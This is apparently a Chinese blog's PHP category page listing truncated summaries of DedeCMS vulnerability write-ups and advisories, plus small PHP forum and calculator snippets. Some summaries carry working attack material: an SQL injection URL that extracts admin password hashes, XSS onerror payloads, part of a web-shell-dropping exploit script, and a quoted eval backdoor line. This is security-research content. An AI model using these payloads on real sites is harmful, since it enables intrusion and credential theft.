随笔分类 -  PHP语言

摘要：影响版本：DEDECMS全版本漏洞描叙：DEDECMS后台登陆模板中的gotopage变量未效验传入数据，导致XSS漏洞。\dede\templets\login.htm65行左右" />由于DEDECMS的全局变量注册机制，该变量内容可以被COOKIE变量覆盖,COOKIE可以在客户端持久化存储，最终导致一个XSS ROOTKIT。漏洞危害：管理员在触发DEDECMS任意的XSS漏洞(如留言本XSS)后，可以通过该漏洞永久劫持覆盖gotopage变量，在DEDECMS的后台登陆页面永久嵌入任意的恶意代码。验证：1.复制粘贴下面的URL访问，触发XSS安装XSS ROOTKIT 阅读全文

摘要：测试方法:@Sebug.netdis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!")};';$buffer = POST($host,80,$url,$data,30);echo "shell:http://$host$argv[2]plus/dst.php,pass:cmd.";}else {echo "Sorry,target may not exist this bug.";exit;}function POST($host,$port,$path,$data,$timeout, $cookie=' 阅读全文

摘要：2012/4/29 凌晨知道创宇安全研究团队截获到最新DEDECMS SQL注入 0day，官网目前提供下载的最新版5.7也受影响，截止本告警发出时官方尚未给出补丁或解决方案，此漏洞利用简单且dedecms安装之后默认即开启漏洞模块。知道创宇给出三种临时解决方案：方案一、临时补丁，需要四步1. 确保您的magic_quotes_gpc = On详细开启方式：打开php安装目录中的php.ini（若您使用的是appserv等集成环境，php.ini可能在系统盘符:\windows\php.ini），搜索magic_quotes_gpc，将其设置为On。2./plus/carbuyaction.p 阅读全文

摘要：该漏洞是cyg07在乌云提交的， 漏洞文件: plus\feedback.php。存在问题的代码:view source01...02if($comtype=='comments')03{04$arctitle=addslashes($title);05if($msg!='')06{//$typeid变量未做初始化07$inquery= "INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,` 阅读全文

摘要：简要描述：DedeCMS V5.7 SP1正式版UTF-8 GBK版本疑似被植入一句话后门前几日下载并不存在此代码详细说明：shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));漏洞证明：shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));修复方案：删除@eval(file_get_contents('php://input')); 阅读全文

摘要：漏洞版本:DedeCms 5.x漏洞描述:DedeCms是免费的PHP网站内容管理系统。plus/carbuyaction.php里没有对变量进行严格的过滤出现漏洞的两个文件为：Include/payment/alipay.phpInclude/payment/yeepay.php漏洞均出现在respond方法里Include/payment/alipay.php......function respond(){if(!empty($_POST)){foreach($_POST as $key => $data){ $_GET[$key]= $data;}}/* 引入配置文件 * 阅读全文

摘要：漏洞地址及证明:/include/dialog/config.php?adminDirHand="/> 阅读全文

摘要：这个问题应该很久了 最近发现有用这个的蠕虫，dede 前台提交友情链接 只用htmlspecialchars简单处理了一下 可以插入代码plus/flink_add.php 提交：表单中提交 图片地址http://111.cc ' onerror='alert(98);'http://111.cc 'onerror=location.href='http://www.baidu.com只用htmlspecialchars做了处理 没有判断数据有效性?1234567891011121314151617$msg = htmlspecialchars($msg 阅读全文

摘要：EXP:Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'ormid=@`\'`/*!50000union*//*!50000select*/1,2,3,(selectCONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_ 阅读全文

摘要：magic_quotes_gpc函数在php中的作用是判断解析用户提示的数据，如包括有:post、get、cookie过来的数据增加转义字符“\”，以确保这些数据不会引起程序，特别是数据库语句因为特殊字符引起的污染而出现致命的错误在magic_quotes_gpc=On的情况下，如果输入的数据有单引号（’）、双引号（”）、反斜线（）与 NUL（NULL 字符）等字符都会被加上反斜线。这些转义是必须的，如果这个选项为off，那么我们就必须调用addslashes这个函数来为字符串增加转义。正是因为这个选项必须为On，但是又让用户进行配置的矛盾，在PHP6中删除了这个选项，一切的编程都需要在mag 阅读全文

摘要：此漏洞无视gpc转义，过80sec注入防御。补充下，不用担心后台找不到。这只是一个demo，都能修改任意数据库了，还怕拿不到SHELL？起因是全局变量$GLOBALS可以被任意修改，随便看了下，漏洞一堆，我只找了一处。include/dedesql.class.php12345678910111213if(isset($GLOBALS['arrs1'])){$v1=$v2='';for($i=0;isset($arrs1[$i]);$i++){$v1.=chr($arrs1[$i]);}for($i=0;isset($arrs2[$i]);$i++){$v2.= 阅读全文

摘要：publicfunction downloads($name){ $name_tmp = explode("_",$name); $type = $name_tmp[0]; $file_time = explode(".",$name_tmp[3]); $file_time = $file_time[0]; $file_date = date("Y/md",$file_time); $file_dir = SITE_PATH."/data/uploads/$type/$file_date/";if(!file_ex 阅读全文

摘要：1.index.php论坛首页论坛首页，欢迎登录 | 主页 | 个人资料 | 退出论坛主页 | 注册 | 登录2.main_forum.php论坛主页个人资料注销用户帖子访问量回复数日期 "> 1) {$prevpage = $page - 1; } //当前记录 $curr... 阅读全文

摘要：PHP计算器 计算器 " > "> '; if($num1 && $num1 && $numa && $numb){ echo "结果：".$_GET["num1"]." ".$_GET["ysf"]." ".$_GET["num2"]." = ".$sum; }else{ echo $message; } echo ''; } ?> 阅读全文